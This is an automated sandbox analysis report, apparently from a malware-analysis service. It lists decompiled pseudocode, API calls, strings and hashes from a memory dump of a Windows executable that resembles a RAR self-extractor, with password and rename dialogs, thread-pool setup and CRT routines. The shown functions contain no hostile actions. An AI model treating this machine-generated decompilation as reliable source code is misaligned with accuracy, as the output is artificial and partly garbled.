0x00406b94
0x00406b96
0x00406b9c
0x00406b9e
0x00406ba0
0x00406ba0
0x00406ba5
0x00406ba5
0x00406bb0
0x00406bc4
0x00406bc7
0x00406bcc
0x00406bce
0x00406bd9
0x00406bda
0x00406bdb
0x00406be0
0x00406be2
0x00406bea
0x00406bea
0x00406be2
0x00406bf5
0x00406bfa
0x00406bfe
0x00406c00
0x00406c02
0x00406c04
0x00406c0b
0x00406c10
0x00406c12
0x00406c2f
0x00406c2f
0x00406c12
0x00406c3c
0x00406c47
0x00406c4b
0x00406c50
0x00406c50
0x00406c50
0x00406c5a
0x00406b48
0x00406b4f
0x00406b5b
0x00406b5b
0x00406c65
0x00406c6d

APIs

__EH_prolog.LIBCMT ref: 00406AD9
_wcscpy.LIBCMT ref: 00406B0F
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000009,?,?,00000000,?,0000003A,00000802), ref: 00406C2F

Strings

:, xrefs: 00406B3E
l*C, xrefs: 00406B56

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: FileH_prologTime_wcscpy
String ID: :$l*C
API String ID: 26009825-3281027349
Opcode ID: 07e1c1bb5a57378bae7cb66d5a50bd52a006078459cf09f73fe77015f35bfd27
Instruction ID: ed6ae773504d4d00d47016c83099ec03e2b9fc4a2f2421c8f8aea0596bfb157c
Opcode Fuzzy Hash: 07e1c1bb5a57378bae7cb66d5a50bd52a006078459cf09f73fe77015f35bfd27
Instruction Fuzzy Hash: E5419371905128AAEB20EB61DD55EEE737CAF04344F4040AFB156B21C5EB786F88CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00413829, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00413829(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t34;
				signed int _t35;
				signed int* _t41;
				signed int _t42;
				signed int _t44;
				void* _t67;
				signed int _t72;
				intOrPtr* _t73;
				void* _t75;
				void* _t77;
				signed int _t81;

				_t34 = E00419DD4(E0042933E, _t75);
				_push(__ecx);
				_push(__ecx);
				_t67 = __ecx;
				_t80 =  *((intOrPtr*)(__ecx + 0x20));
				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
					_push(0x400400);
					 *((intOrPtr*)(_t67 + 0x20)) = E004199E2(0, __edx, __ecx, _t80);
					_t34 = E0041A110(_t67, _t46, 0, 0x400400);
					_t77 = _t77 + 0x10;
				}
				_t81 =  *(_t67 + 0x18);
				if(_t81 != 0) {
					L12:
					 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
					return _t34;
				} else {
					_t72 =  *((intOrPtr*)(_t67 + 0x1c)) +  *((intOrPtr*)(_t67 + 0x1c));
					_t35 = _t72;
					_t65 = _t35 * 0x4ae4 >> 0x20;
					_push( ~(0 | _t81 > 0x00000000) | ( ~(0 | _t81 > 0x00000000) | _t35 * 0x00004ae4) + 0x00000004);
					_t41 = E004199E2(0x4ae4, _t35 * 0x4ae4 >> 0x20, _t67, _t81);
					 *(_t75 - 0x10) = _t41;
					 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
					_t82 = _t41;
					if(_t41 == 0) {
						_t42 = 0;
						__eflags = 0;
					} else {
						_push(E004126BE);
						_push(E004126A6);
						_push(_t72);
						 *_t41 = _t72;
						_t44 =  &(_t41[1]);
						_push(0x4ae4);
						_push(_t44);
						 *(_t75 - 0x14) = _t44;
						E0041BFA6(_t72, _t82);
						_t42 =  *(_t75 - 0x14);
					}
					 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
					 *(_t67 + 0x18) = _t42;
					_t34 = E0041A110(_t67, _t42, 0, _t72 * 0x4ae4);
					if(_t72 > 0) {
						 *(_t75 - 0x10) =  *(_t75 - 0x10) & 0x00000000;
						 *(_t75 - 0x14) = _t72;
						do {
							_t34 =  *(_t67 + 0x18) +  *(_t75 - 0x10);
							_t26 = _t34 + 0x4ad4; // 0x4ad4
							_t73 = _t26;
							if( *_t73 == 0) {
								 *((intOrPtr*)(_t34 + 0x4adc)) = 0x4100;
								_t34 = E0041C86E(0x4ae4, _t65, _t67, 0x30c00);
								 *_t73 = _t34;
								if(_t34 == 0) {
									_t34 = E004062F7(0x432a6c);
								}
							}
							 *(_t75 - 0x10) =  *(_t75 - 0x10) + 0x4ae4;
							_t30 = _t75 - 0x14;
							 *_t30 =  *(_t75 - 0x14) - 1;
						} while ( *_t30 != 0);
					}
					goto L12;
				}
			}

0x0041382e
0x00413833
0x00413834
0x00413838
0x0041383c
0x0041383f
0x00413846
0x0041384f
0x00413852
0x00413857
0x00413857
0x0041385a
0x0041385d
0x0041391f
0x00413925
0x0041392d
0x00413863
0x00413866
0x0041386f
0x00413873
0x00413888
0x00413889
0x0041388f
0x00413892
0x00413896
0x00413898
0x004138b9
0x004138b9
0x0041389a
0x0041389a
0x0041389f
0x004138a4
0x004138a5
0x004138a7
0x004138aa
0x004138ab
0x004138ac
0x004138af
0x004138b4
0x004138b4
0x004138bb
0x004138cb
0x004138ce
0x004138d8
0x004138da
0x004138de
0x004138e1
0x004138e4
0x004138e7
0x004138e7
0x004138f0
0x004138f7
0x00413901
0x00413907
0x0041390b
0x00413912
0x00413912
0x0041390b
0x00413917
0x0041391a
0x0041391a
0x0041391a
0x004138e1
0x00000000
0x004138d8

APIs

__EH_prolog.LIBCMT ref: 0041382E
_memset.LIBCMT ref: 00413852
_memset.LIBCMT ref: 004138CE
_malloc.LIBCMT ref: 00413901

Strings

l*C, xrefs: 0041390D

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$H_prolog_malloc
String ID: l*C
API String ID: 1600808285-1043478356
Opcode ID: 496b9ec5f57a7e1a3826986ed4b8b2a41364a3369d14b3601f723f5e8dcb557b
Instruction ID: affc65c4d5bf9128451ee149027940f4ec000d7d5d5dd22563193e12b754be03
Opcode Fuzzy Hash: 496b9ec5f57a7e1a3826986ed4b8b2a41364a3369d14b3601f723f5e8dcb557b
Instruction Fuzzy Hash: 0B3184B1E10216AFDB14AF65C8467EF72A8EB14319F10017FE505E7281E7B89E8087AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE9F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040DE9F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				void* _v4100;
				void* __ebx;
				struct HWND__* _t15;
				void* _t25;
				void* _t26;
				signed int _t27;
				signed int _t29;
				void* _t35;
				struct HWND__* _t38;
				void* _t40;
				void* _t41;

				E0041A3E0(0x1000);
				if( *0x442e32 == 0) {
					_t15 =  *0x440cf8;
					_t38 = _t15;
					if(_a4 == 2 && IsWindowVisible(_t15) == 0) {
						_t38 = 0;
					}
					E0040A078(_t26, _a8, _a12,  &_v4100, 0x800);
					if( *0x44c3d8 != 0 || DialogBoxParamW( *0x432a64, L"GETPASSWORD1", _t38, E0040D19C,  &_v4100) != 0) {
						_t25 = _a16;
						_t27 = 0x40;
						memcpy(_t25, 0x44c2d8, _t27 << 2);
						_t41 = _t41 + 0xc;
						asm("movsw");
					} else {
						_t25 = _a16;
						E0040CCBC(_t25, _t25, 0x42a53c);
						 *0x440cea = 1;
					}
					if( *((char*)(_t25 + 0x100)) != 0) {
						_t40 = _t25;
						_t35 = 0x442d32;
						goto L11;
					}
				} else {
					_t25 = _a16;
					_t40 = 0x442d32;
					_t35 = _t25;
					L11:
					_t29 = 0x40;
					memcpy(_t35, _t40, _t29 << 2);
					asm("movsw");
				}
				return  *((intOrPtr*)(_t25 + 0x100));
			}

0x0040dea7
0x0040deb6
0x0040decb
0x0040ded0
0x0040ded2
0x0040dedf
0x0040dedf
0x0040def3
0x0040deff
0x0040df3b
0x0040df40
0x0040df48
0x0040df48
0x0040df4a
0x0040df23
0x0040df23
0x0040df2d
0x0040df32
0x0040df32
0x0040df53
0x0040df55
0x0040df57
0x00000000
0x0040df57
0x0040deb8
0x0040deb8
0x0040debb
0x0040dec0
0x0040df5c
0x0040df5e
0x0040df5f
0x0040df61
0x0040df61
0x0040df6d

APIs

IsWindowVisible.USER32(?), ref: 0040DED5
DialogBoxParamW.USER32 ref: 0040DF19

Strings

2-D, xrefs: 0040DF57
GETPASSWORD1, xrefs: 0040DF0E
2-D, xrefs: 0040DEBB

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: DialogParamVisibleWindow
String ID: 2-D$2-D$GETPASSWORD1
API String ID: 3157717868-1414519567
Opcode ID: d3ad13eacf40041624f0b89d0117da04072bb4753cc75ff97ad4ae057048e955
Instruction ID: 6e19932385747c208048977cff5f400cc36aac6f2fd8ab3e9e45379535e9effa
Opcode Fuzzy Hash: d3ad13eacf40041624f0b89d0117da04072bb4753cc75ff97ad4ae057048e955
Instruction Fuzzy Hash: A411E431A00245ABEB21CFA0DC84B973B54A715754F58407ABD45AB2C1CBF88C9987AD

Uniqueness

Uniqueness Score: -1.00%

Function 00410B34, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00410B34(long* __ecx, long _a4) {
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t23 = 0x20;
				_t25 = __ecx;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x21] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0x68]); // 0x1a0
				_t25[0x65] = 0;
				InitializeCriticalSection(_t3);
				_t25[0x66] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0x67] = _t14;
				if(_t25[0x66] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0x432a6c);
					E0040634C(_t19);
					E004062C3(0x432a6c, 2);
				}
				_t25[0x63] = 0;
				_t25[0x64] = 0;
				_t25[0x22] = 0;
				return _t25;
			}

0x00410b34
0x00410b34
0x00410b3d
0x00410b3e
0x00410b40
0x00410b44
0x00410b46
0x00410b46
0x00410b4c
0x00410b4e
0x00410b4e
0x00410b54
0x00410b5c
0x00410b5e
0x00410b5e
0x00410b60
0x00410b67
0x00410b6d
0x00410b83
0x00410b89
0x00410b8f
0x00410b9b
0x00410ba1
0x00410bab
0x00410bac
0x00410bb7
0x00410bb7
0x00410bbd
0x00410bc3
0x00410bc9
0x00410bd3

APIs

InitializeCriticalSection.KERNEL32(000001A0,?,0044EA50,?,00410CC4,00000020,?,0040966E,?,00000000,?,0040B6EF,?,00000000), ref: 00410B6D
CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0040966E,?,00000000,?,0040B6EF,?,00000000), ref: 00410B77
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0040966E,?,00000000,?,0040B6EF,?,00000000), ref: 00410B89

Strings

l*C, xrefs: 00410BA6
Thread pool initialization failed., xrefs: 00410BA1

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.$l*C
API String ID: 3340455307-1404452936
Opcode ID: caa2d432eb3f79a9526b2c342a17c6031517a0f13f25754367c9d70d9b655536
Instruction ID: 898056c2d0e6a2d3b3fefa7b5792f1a181759ce1c2c93bcb981909a8a314cde8
Opcode Fuzzy Hash: caa2d432eb3f79a9526b2c342a17c6031517a0f13f25754367c9d70d9b655536
Instruction Fuzzy Hash: 9D115EB1600301AFD3305FA59885BDBBAE8EB55354F60482EF6DEC6241D6B428C0CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040D113, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040D113(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t11;
				void* _t17;
				void* _t21;
				struct HWND__* _t22;
				WCHAR* _t23;

				_t23 = _a16;
				_t22 = _a4;
				if(E00406056(_t21, _t22, _a8, _a12, _t23, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t11 = _a8 - 0x110;
				if(_t11 == 0) {
					 *0x44c3e8 = _t23;
					SetDlgItemTextW(_t22, 0x65, _t23);
					SetDlgItemTextW(_t22, 0x66,  *0x44c3e8);
					goto L10;
				}
				if(_t11 != 1) {
					L5:
					return 0;
				}
				_t17 = (_a12 & 0x0000ffff) - 1;
				if(_t17 == 0) {
					GetDlgItemTextW(_t22, 0x66,  *0x44c3e8, 0x800);
					_push(1);
					L7:
					EndDialog(_t22, ??);
					goto L10;
				}
				if(_t17 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0040d117
0x0040d11b
0x0040d136
0x0040d193
0x00000000
0x0040d195
0x0040d13b
0x0040d140
0x0040d179
0x0040d186
0x0040d191
0x00000000
0x0040d191
0x0040d143
0x0040d14f
0x00000000
0x0040d14f
0x0040d149
0x0040d14a
0x0040d16c
0x0040d172
0x0040d155
0x0040d156
0x00000000
0x0040d156
0x0040d14d
0x0040d153
0x00000000
0x0040d153
0x00000000

APIs

EndDialog.USER32(?,00000001), ref: 0040D156
GetDlgItemTextW.USER32 ref: 0040D16C
SetDlgItemTextW.USER32 ref: 0040D186
SetDlgItemTextW.USER32 ref: 0040D191

Strings

RENAMEDLG, xrefs: 0040D122

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$Dialog
String ID: RENAMEDLG
API String ID: 1770891597-3299779563
Opcode ID: 9e8829a053f59ee0d723c37b91550de9b9b6549352a51dd2ad9da7953e8feea3
Instruction ID: f552f46ae0138908b6bb1baaf94687a43ef99185baa885e77f197f1c6cae43ba
Opcode Fuzzy Hash: 9e8829a053f59ee0d723c37b91550de9b9b6549352a51dd2ad9da7953e8feea3
Instruction Fuzzy Hash: F301B931E40219F7DB205F949C41FBB3B29E745B90F104032FA04FA2D4CABA9455D7AE

Uniqueness

Uniqueness Score: -1.00%

Function 00410E04, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00410E04() {
				void* __ecx;
				void* _t5;
				int _t8;
				void* _t13;
				void** _t20;
				void* _t23;
				void* _t24;

				_t23 = 0;
				if( *0x432a6c > 0) {
					_t20 = 0x432a70;
					do {
						_t13 = CreateThread(0, 0x10000, E00410DA6, 0x432a6c, 0, _t24 + 0x10);
						if(_t13 == 0) {
							_push(L"CreateThread failed");
							_push(0x432a6c);
							E00422FB3(E0040634C(0x432a6c));
							E004062C3(0x432a6c, 2);
						}
						 *_t20 = _t13;
						 *0x00432AF0 =  *((intOrPtr*)(0x432af0)) + 1;
						_t8 =  *0x44ea4c; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t20, _t8);
						}
						_t23 = _t23 + 1;
						_t20 =  &(_t20[1]);
					} while (_t23 <  *0x432a6c);
					return _t8;
				}
				return _t5;
			}

0x00410e09
0x00410e0d
0x00410e11
0x00410e14
0x00410e2e
0x00410e32
0x00410e34
0x00410e39
0x00410e4a
0x00410e56
0x00410e56
0x00410e5b
0x00410e5d
0x00410e63
0x00410e6a
0x00410e6f
0x00410e6f
0x00410e75
0x00410e76
0x00410e79
0x00000000
0x00410e7e
0x00410e82

APIs

CreateThread.KERNEL32(00000000,00010000,00410DA6,?,00000000,?), ref: 00410E28
SetThreadPriority.KERNEL32(?,00000000,?,?,00410E94,-00000108,00404F80), ref: 00410E6F

Part of subcall function 0040634C: __vswprintf_c_l.LIBCMT ref: 0040636A

Strings

l*C, xrefs: 00410E51
l*C, xrefs: 00410E45
CreateThread failed, xrefs: 00410E34

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed$l*C$l*C
API String ID: 2655393344-1709444004
Opcode ID: 3cacdc51211924b89dc93c44a654cfbd9001109ab98639852898bd22871c4884
Instruction ID: 7e519160a7578847ff2fcfa434f5fd3de1fc33796b90ebb98dcd9fb8a0253012
Opcode Fuzzy Hash: 3cacdc51211924b89dc93c44a654cfbd9001109ab98639852898bd22871c4884
Instruction Fuzzy Hash: 810126723443066BE2306F52AD05FA77358EB44711F20082FFA46A1280DFF56990876C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D4D4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041D4D4(void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;
				void* _t25;

				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E0041E3B4(_t23, __edx, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E0041E3B4(_t23, __edx, _t25, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E0041E3B4(_t23, __edx, _t25, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x42d8b0);
						E0041F49C(_t23, _t25, __esi);
						_t19 =  *((intOrPtr*)(E0041E3B4(_t23, __edx, _t25, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E0041F4E1(E00423A61(_t23, _t24, _t25));
					}
				}
			}

0x0041d4d4
0x0041d4de
0x0041d4e5
0x0041d504
0x0041d50b
0x0041d512
0x0041d517
0x0041d517
0x0041d517
0x00000000
0x0041d4e7
0x0041d4e7
0x0041d4ec
0x0041d519
0x0041d519
0x0041d51c
0x0041d4ee
0x0041d4f3
0x0041e68a
0x0041e68c
0x0041e691
0x0041e69b
0x0041e6a0
0x0041e6a2
0x0041e6a6
0x0041e6b1
0x0041e6b1
0x0041e6c2
0x0041e6c2
0x0041d4ec

APIs

__getptd.LIBCMT ref: 0041D4EE

Part of subcall function 0041E3B4: __getptd_noexit.LIBCMT ref: 0041E3B7
Part of subcall function 0041E3B4: __amsg_exit.LIBCMT ref: 0041E3C4

__getptd.LIBCMT ref: 0041D4FF
__getptd.LIBCMT ref: 0041D50D

Strings

MOC, xrefs: 0041D4E0
csm, xrefs: 0041D4E7

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: 1212b773b2336782a87b9bb145af6b237de23bd1cd124fab0cf7c495f7905bd8
Instruction ID: 4b229817a96dd871c90da90fdccbb978bf41b4ae1d9fd8bd87adfcb91bd62e23
Opcode Fuzzy Hash: 1212b773b2336782a87b9bb145af6b237de23bd1cd124fab0cf7c495f7905bd8
Instruction Fuzzy Hash: 0AE01A795002088FD710AA6AC046BE933A5AB4831CF5904A7AD19CB363D73CE8C09A8F

Uniqueness

Uniqueness Score: -1.00%

Function 0042159D, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0042159D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x42d990);
				E0041F49C(__ebx, __edi, __esi);
				_t31 = E0041E3B4(__ebx, __edx, __edi, _t35);
				_t15 =  *0x42fd9c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0041E9A3(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x42fca0; // 0x2251628
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x42f878;
								if(__eflags != 0) {
									_push(_t33);
									E00419DFE(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x42fca0; // 0x2251628
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x42fca0; // 0x2251628
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00421638();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00420A85(_t29, _t31, 0x20);
				}
				return E0041F4E1(_t33);
			}

0x0042159d
0x0042159d
0x0042159d
0x0042159d
0x0042159f
0x004215a4
0x004215ae
0x004215b0
0x004215b8
0x004215d9
0x004215df
0x004215e3
0x004215e6
0x004215e9
0x004215ef
0x004215f1
0x004215f3
0x004215f6
0x004215fc
0x004215fe
0x00421600
0x00421606
0x00421608
0x00421609
0x0042160e
0x00421606
0x004215fe
0x0042160f
0x00421614
0x00421617
0x0042161d
0x00421621
0x00421621
0x00421627
0x0042162e
0x004215c0
0x004215c0
0x004215c0
0x004215c5
0x004215c9
0x004215ce
0x004215d6

APIs

__getptd.LIBCMT ref: 004215A9

Part of subcall function 0041E3B4: __getptd_noexit.LIBCMT ref: 0041E3B7
Part of subcall function 0041E3B4: __amsg_exit.LIBCMT ref: 0041E3C4

__amsg_exit.LIBCMT ref: 004215C9
__lock.LIBCMT ref: 004215D9
InterlockedDecrement.KERNEL32(?), ref: 004215F6
InterlockedIncrement.KERNEL32(02251628), ref: 00421621

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 61977c95e562309cd4f34fabe9410a784ae302388df40878ba810b00d7caad46
Instruction ID: c4428e6cac382b2e417ffe6ea43d3bd444993a4fc72741b0c3ff87a298b725ff
Opcode Fuzzy Hash: 61977c95e562309cd4f34fabe9410a784ae302388df40878ba810b00d7caad46
Instruction Fuzzy Hash: AD01C831B00631ABC721AF26A40579E73B0BF54724FD4007BE800A73A1CB2C6982CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 004119C7, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004119C7(void* __eflags, short* _a4, short* _a8, int _a12) {
				void* _t8;
				int _t12;
				int _t22;
				int _t23;

				_t8 = E0041A0A7(_a4);
				_t22 = _a12;
				if(_t8 + 1 >= _t22) {
					_t23 = _t22;
				} else {
					_t23 = E0041A0A7(_a4) + 1;
				}
				if(E0041A0A7(_a8) + 1 >= _t22) {
					_t12 = _t22;
				} else {
					_t12 = E0041A0A7(_a8) + 1;
				}
				return CompareStringW(0x400, 0x1001, _a4, _t23, _a8, _t12);
			}

0x004119cf
0x004119d4
0x004119db
0x004119eb
0x004119dd
0x004119e8
0x004119e8
0x004119f9
0x00411a07
0x004119fb
0x00411a04
0x00411a04
0x00411a26

APIs

_wcslen.LIBCMT ref: 004119CF
_wcslen.LIBCMT ref: 004119E0
_wcslen.LIBCMT ref: 004119F0
_wcslen.LIBCMT ref: 004119FE
CompareStringW.KERNEL32(00000400,00001001,?,?,00000000,?,?,00000000,?,00409C61,__rar_,00000000,00000006,00000000,?,?), ref: 00411A1B

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 98a43519ce9f7f46b0b4685922953d60658d963083a2527be2d91ae34c4c7509
Instruction ID: e690a2f5d7995299d5acf7de1448cdaeece7af7b2e449e0e04cc77d61cc5fe79
Opcode Fuzzy Hash: 98a43519ce9f7f46b0b4685922953d60658d963083a2527be2d91ae34c4c7509
Instruction Fuzzy Hash: 05F0BB321590947FDF125F92EC01CDE3F16DB85375F208017FA6AC9060D63588E1D799

Uniqueness

Uniqueness Score: -1.00%

Function 004162C9, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004162C9(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t176;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t184;
				signed int _t185;
				signed int _t190;
				signed int _t194;
				signed int _t195;
				intOrPtr _t196;
				signed int _t197;
				signed int _t203;
				signed int _t215;
				signed int _t248;
				signed int _t250;
				void* _t262;
				signed int _t263;
				signed int* _t265;
				signed int _t266;
				signed int* _t267;
				signed int* _t268;
				signed int* _t269;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				intOrPtr _t280;
				signed int* _t309;
				void* _t318;
				signed int _t320;
				signed int* _t325;
				signed int* _t327;
				signed int _t328;
				void* _t329;
				void* _t331;
				signed int _t333;
				signed int _t334;
				void* _t337;
				signed int _t339;
				signed int _t341;
				void* _t342;
				void* _t344;
				void* _t345;
				void* _t346;
				void* _t348;

				_t318 = __edx;
				E00419DD4(E00429350, _t342);
				_t345 = _t344 - 0x24;
